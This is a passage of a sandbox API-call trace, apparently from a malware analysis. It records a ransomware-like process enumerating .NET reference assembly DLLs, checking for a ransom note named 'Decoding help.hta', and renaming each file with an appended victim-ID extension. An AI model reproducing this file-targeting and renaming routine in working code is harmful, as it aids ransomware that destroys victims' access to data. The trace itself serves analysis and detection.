Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0056.695] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PresentationBuildTasks.dll") returned -1 [0056.695] lstrlenW (lpString="PresentationBuildTasks.dll") returned 26 [0056.695] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0056.695] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.695] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.695] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="PresentationBuildTasks.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationBuildTasks.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationBuildTasks.dll" [0056.695] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationBuildTasks.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationBuildTasks.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationBuildTasks.dll" [0056.695] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationBuildTasks.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationBuildTasks.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationBuildTasks.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.696] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationBuildTasks.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\presentationbuildtasks.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationBuildTasks.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\presentationbuildtasks.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.698] FindNextFileW (in: hFindFile=0x5d87d0, lpFindFileData=0xfd8fd30 | out: lpFindFileData=0xfd8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa990338c, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa990338c, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa99757ac, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x3d0000, dwReserved0=0x0, dwReserved1=0x0, cFileName="PresentationCore.dll", cAlternateFileName="")) returned 1 [0056.698] lstrcpyW (in: lpString1=0x24550388, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.698] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.698] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0056.698] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0056.698] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PresentationCore.dll") returned -1 [0056.698] lstrlenW (lpString="PresentationCore.dll") returned 20 [0056.698] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.698] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.698] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="PresentationCore.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationCore.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationCore.dll" [0056.698] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationCore.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationCore.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationCore.dll" [0056.698] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationCore.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationCore.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationCore.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.698] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationCore.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\presentationcore.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationCore.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\presentationcore.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.701] FindNextFileW (in: hFindFile=0x5d87d0, lpFindFileData=0xfd8fd30 | out: lpFindFileData=0xfd8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x993ade39, ftCreationTime.dwHighDateTime=0x1ca041e, ftLastAccessTime.dwLowDateTime=0x993ade39, ftLastAccessTime.dwHighDateTime=0x1ca041e, ftLastWriteTime.dwLowDateTime=0x5b475983, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x30000, dwReserved0=0x0, dwReserved1=0x0, cFileName="PresentationFramework.Aero.dll", cAlternateFileName="")) returned 1 [0056.701] lstrcpyW (in: lpString1=0x9af9288, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.701] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.701] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0056.701] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0056.701] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PresentationFramework.Aero.dll") returned -1 [0056.701] lstrlenW (lpString="PresentationFramework.Aero.dll") returned 30 [0056.701] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0056.701] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.701] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.701] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="PresentationFramework.Aero.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Aero.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Aero.dll" [0056.701] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Aero.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Aero.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Aero.dll" [0056.701] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Aero.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Aero.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Aero.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.701] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Aero.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.aero.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Aero.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.aero.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.701] FindNextFileW (in: hFindFile=0x5d87d0, lpFindFileData=0xfd8fd30 | out: lpFindFileData=0xfd8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x994463ad, ftCreationTime.dwHighDateTime=0x1ca041e, ftLastAccessTime.dwLowDateTime=0x994463ad, ftLastAccessTime.dwHighDateTime=0x1ca041e, ftLastWriteTime.dwLowDateTime=0x5b72321f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x22000, dwReserved0=0x0, dwReserved1=0x0, cFileName="PresentationFramework.Classic.dll", cAlternateFileName="")) returned 1 [0056.701] lstrcpyW (in: lpString1=0x9af9288, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.701] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.701] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0056.702] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0056.702] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PresentationFramework.Classic.dll") returned -1 [0056.702] lstrlenW (lpString="PresentationFramework.Classic.dll") returned 33 [0056.702] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0056.702] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.702] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.702] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="PresentationFramework.Classic.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Classic.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Classic.dll" [0056.702] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Classic.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Classic.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Classic.dll" [0056.702] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Classic.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Classic.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Classic.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.702] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Classic.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.classic.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Classic.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.classic.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.702] FindNextFileW (in: hFindFile=0x5d87d0, lpFindFileData=0xfd8fd30 | out: lpFindFileData=0xfd8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa981eb4a, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa981eb4a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa98b70cb, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x46c000, dwReserved0=0x0, dwReserved1=0x0, cFileName="PresentationFramework.dll", cAlternateFileName="")) returned 1 [0056.702] lstrcpyW (in: lpString1=0x9af9288, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.702] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.702] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0056.702] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0056.702] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PresentationFramework.dll") returned -1 [0056.702] lstrlenW (lpString="PresentationFramework.dll") returned 25 [0056.702] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.702] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.702] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="PresentationFramework.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.dll" [0056.703] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.dll" [0056.703] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.703] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.703] FindNextFileW (in: hFindFile=0x5d87d0, lpFindFileData=0xfd8fd30 | out: lpFindFileData=0xfd8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99e17da7, ftCreationTime.dwHighDateTime=0x1ca041e, ftLastAccessTime.dwLowDateTime=0x99e17da7, ftLastAccessTime.dwHighDateTime=0x1ca041e, ftLastWriteTime.dwLowDateTime=0x5b807a53, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x5d000, dwReserved0=0x0, dwReserved1=0x0, cFileName="PresentationFramework.Luna.dll", cAlternateFileName="")) returned 1 [0056.703] lstrcpyW (in: lpString1=0x9af9288, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.703] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.703] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0056.703] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0056.703] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PresentationFramework.Luna.dll") returned -1 [0056.703] lstrlenW (lpString="PresentationFramework.Luna.dll") returned 30 [0056.703] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0056.703] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.703] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.703] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="PresentationFramework.Luna.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Luna.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Luna.dll" [0056.703] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Luna.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Luna.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Luna.dll" [0056.703] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Luna.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Luna.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Luna.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.703] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Luna.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.luna.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Luna.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\presentationframework.luna.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.708] FindNextFileW (in: hFindFile=0x5d87d0, lpFindFileData=0xfd8fd30 | out: lpFindFileData=0xfd8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99efc5d5, ftCreationTime.dwHighDateTime=0x1ca041e, ftLastAccessTime.dwLowDateTime=0x99efc5d5, ftLastAccessTime.dwHighDateTime=0x1ca041e, ftLastWriteTime.dwLowDateTime=0x5cc8f6ff, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x28000, dwReserved0=0x0, dwReserved1=0x0, cFileName="PresentationFramework.Royale.dll", cAlternateFileName="")) returned 1 [0056.708] lstrcpyW (in: lpString1=0x9af9288, lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.708] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.708] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" [0056.708] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\Decoding help.hta" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.0\\decoding help.hta")) returned 0x1 [0056.708] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PresentationFramework.Royale.dll") returned -1 [0056.708] lstrlenW (lpString="PresentationFramework.Royale.dll") returned 32 [0056.708] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0056.708] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*" [0056.708] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\*.*") returned 70 [0056.708] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\", lpString2="PresentationFramework.Royale.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Royale.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Royale.dll" [0056.708] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Royale.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Royale.dll") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Royale.dll" [0056.708] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Royale.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Royale.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Royale.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0056.708] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\PresentationFramework.Royale.dll" (normalized: 